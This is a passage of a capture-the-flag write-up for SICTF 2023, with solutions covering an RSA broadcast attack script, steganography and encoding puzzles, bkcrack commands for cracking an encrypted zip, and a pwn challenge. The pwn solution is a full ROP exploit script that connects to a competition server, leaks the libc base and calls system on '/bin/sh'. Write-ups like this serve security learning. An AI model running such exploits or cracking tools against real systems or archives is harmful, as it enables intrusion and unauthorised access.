from Crypto.Util.number import long_to_bytes


def CRT(items):
    N = reduce(lambda x, y: x * y, (i[1] for i in items))
    result = 0
    for a, n in items:
        m = N // n
        d, r, s = gmpy2.gcdext(n, m)
        if d != 1:
            raise Exception("Input not pairwise co-prime")
        result += a * s * m
    return result % N, N
# e, n, c
e = 17
n1 = 14628911682936716611458501697007036859460044243525290515096052103585430459755335375005202100114469571371360084664887335211277585652711111523095037589648375630146039444071400098427638768750755153219974194380355807078158427824557754939604018020265955042573660474772006646525311705184431094905718137297923127124517126579859336516891364853724635334011666814712424599592662398013241607855160919361308195967978220182785816761656927836373944699635667244275310680450562446433724968942835275279255823144471582249379035668825437133182865600026935116686574740844588839352146024513673500770611055698030333734066230166111140083923
n2 = 16756694748293603983474688536179571665757862433174984877308316444468003022266277794769268134195205510197588585566270416339902269736376811449830775290335951504698137924773942880807921752691668522662285163130340474205633998154849689387759453003838730282756734975490180702422176361373516245372635401939755527017589503572550811648345570775428936487145892225736625411540461653083957762795820510109891180906709827194217045059033312564525916136573856999724346161896146703174418039344166251503310869772735585554127509732135494936119159784702673291794381095696332128950979288440758815310482211285712819274848744478643590996499
n3 = 12023158079717019193506148537498877243668782424904061914991928068483879707115315968983829360560644394409575645736275352836086080024994045582242629571839276759393418303915955798990522990081795218822313146157773272844272865701134880180795342597049645358985187689813369428579614193015028249821853347208001645148169449968882591709833452960545988520048722323580338213590245476892223967673180144525106292453573842357322398199104132677638909964034937501684668442732786408572501007756270725934445316827054687741612177409932320532825182104820899546084015733164816993674100635828218335112393003462442685677115798304835391938681
c1 = 786426913645332991929803636719878643130489430090701482974255190570111407517277263761161970232982615374753982050075781017755721714929721429185828101898786972242994012456972241276851428750970754773002966788642795040933520662931514953660571657013642671173456750800960592586345219252277575624120271330470724245201080094330964145796872211627254805407394764183615099525852600855622089361965086460279057625205099471122036599934609091062009161119885692567925924978687256063116915630947838112126347748759078024890458539541208153526564434483654508834147071166870006117573542198238493913144419569943131642262575848786399020602
c2 = 14269311999815379511888097227418748728398011595172649708273598243317106830139061994801598925448165045032084910971094414749744701731066555194159863759072739031915833091715422787808666326235589236328864675164322734119047182014621724868200908222400504845559290620275973427127376594365043386362821355037781568524903149101953873768462097165128186788759111090267131443645126715520994688945363059795513931799317608292977574376954729552861360597103229877031117089231816770880909815561950691603994439997197261395452797893557057320175747162837857668062550646101714062365530246698404923128445182100334335447738834779014705114350
c3 = 3204718091370324153305164801961074660508922478706979436653573192321723216725523523538914956544950802616295043619768261075799875855502834749045520466140056621489305006966280527055668378303630674311102581232313032585389907028715671091914904062961720585667564982641321454541632782484415075257140508738041786400512095949826279576159569786734978545737717138115729502475357594151593143140355121154223614868465202149338507796306863351134218879326031985027900678671697876083351974546516576983143592764763925335805465720148057651958521255276602933604064541840892578409973858867533575728482926007556060584654853884046046420855

n = [n1, n2, n3]
c = [c1, c2, c3]

data = list(zip(c, n))
x, n = CRT(data)
for i in range(17, 18):
    e = i
    m = gmpy2.iroot(gmpy2.mpz(x), e)[0].digits()
    print(long_to_bytes(int(m)))

# b'SICTF{fdc0afb5-1c81-46b9-a28a-241f5f64419d}'

MISC

[Sign-in] Welcome

Follow the WeChat official account and send "SICTF2023" to get the flag!

Pixel_art

  1. First a fake-encrypted zip: repair it with WinRAR and an image extracts.

  2. Inspect the image with zsteg; another image is hidden inside it.

  3. Extract it.

    zsteg Pixel_art.png -e "b1,rgb,lsb,xy" ->out.png
  4. Extract the file's RGB information through an online site, which yields a string of . ? ! characters.

    ..................!?!!.?..................?.?!.?....!.?.......!?!!.?!!!!!!?.?!.?!!!.!!!!!!!!!!!!!.?.........!?!!.?........?.?!.?..!.?.......!?!!.?!!!!!!?.?!.?!!!!!!!!!!!.?...............!?!!.?..............?.?!.?........!.?.................!?!!.?!!!!!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!!!!!...!.......!.!!!!!!!.?.............!?!!.?............?.?!.?........................!.....!.?.............!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!!!!!!!.....!.!!!!!!!!!!!!!!!!!.?...............!?!!.?..............?.?!.?..............!.!!!!!.?...............!?!!.?!!!!!!!!!!!!!!?.?!.?!!!.................!.?.......!?!!.?!!!!!!?.?!.?!!!!!!!...............!.?.............!?!!.?............?.?!.?......................!.....!.!.?...............!?!!.?!!!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!.?...............!?!!.?..............?.?!.?......!.?.............!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!.!!!!!!!!!!!!!!!!!!!.............!.!!!!!!!!!!!!!!!!!!!...........!.!.............!.!!!!!!!!!!!!!!!!!...........!.?...............!?!!.?..............?.?!.?!.!!!!!.!!!!!.......!.!!!.?.............!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!.!.?.................!?!!.?................?.?!.?............!.?.
  5. This is Ook encoding; decode it on an online site to get the flag.

fast_morse

  1. Open the attachment in Audacity; it looks like Morse code.

  2. Transcribe it by hand to get a Morse string.

    ..-. ..--- .- ----- ----. -... ..-. -....- --... ..-. ....- .- -....- ....- ..--- -.... ----. -....- ----. ...-- .- ..... -....- -.-. ---.. .- ....- ---.. ...-- -.... ----- -... ----- ...-- -.-.
  3. Decode the Morse online to get the flag.

baby_zip

Reference link: https://www.cnblogs.com/zysgmzb/p/16834602.html

  1. First write the PNG header into a file.

  2. Attack with bkcrack.

    bkcrack.exe -C flag.zip -c flag.png -p plan.out -o 0

  3. Extract flag.png.

    bkcrack.exe -C flag.zip -c flag.png -k 6424c164 7c334afd f99666e5 -d flag.png

  4. Finally, the flag is visible at the tail of the PNG.

PWN

[Sign-in] Shop

As the description suggests, connect with nc and enter -1 a few times to get the flag.

Different_gadget

Use the leftover rdx and rsi from read for a ret2write: call write to leak a large chunk of memory and obtain the libc base, then use the second read to get a shell. The full exploit:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from ckyan.pwn.my_script import *

local = 0
debug = 0

binary = "attachment"

if binary != "":
    elf = ELF(binary)

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "210.44.151.51"
    port = "10268"
    p = remote(ip, port)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"

init(lib, binary, p)
context = init_context("tmux", debug)

if lib != "":
    libc = ELF(lib)

if debug and local:
    ggdb()

name = lambda obj : [name for name in globals() if globals()[name] is obj][0]
set_libc = lambda buf : set_libc_base_and_log(name(buf), buf)
lg = lambda buf : log_addr(name(buf), buf)

padding = 0x20

rwp_addr = 0x404800

pad1 = b''
pad1 += b'a' * padding
pad1 += p64(rwp_addr)
pad1 += p64(0x4011CE)

# D()

ru(b'Hello!!!')
s(pad1)

r(200)

leak_addr = r7f()
lg(leak_addr)

libc_base = leak_addr - libc.sym['__libc_start_main'] - 128
libc = lg(libc_base)

# ret = gadget("ret")
# pop_rdi_ret = gadget("pop rdi;ret")

ret = libc.address + 0x29cd6
pop_rdi_ret = libc.address + 0x2a3e5

bin_sh_addr = srch("/bin/sh\x00")

pad2 = b''
pad2 += b'a' * padding
pad2 += p64(rwp_addr)
pad2 += p64(ret)
pad2 += p64(pop_rdi_ret)
pad2 += p64(bin_sh_addr)
pad2 += p64(libc.sym['system'])

# D()

s(pad2)

ia()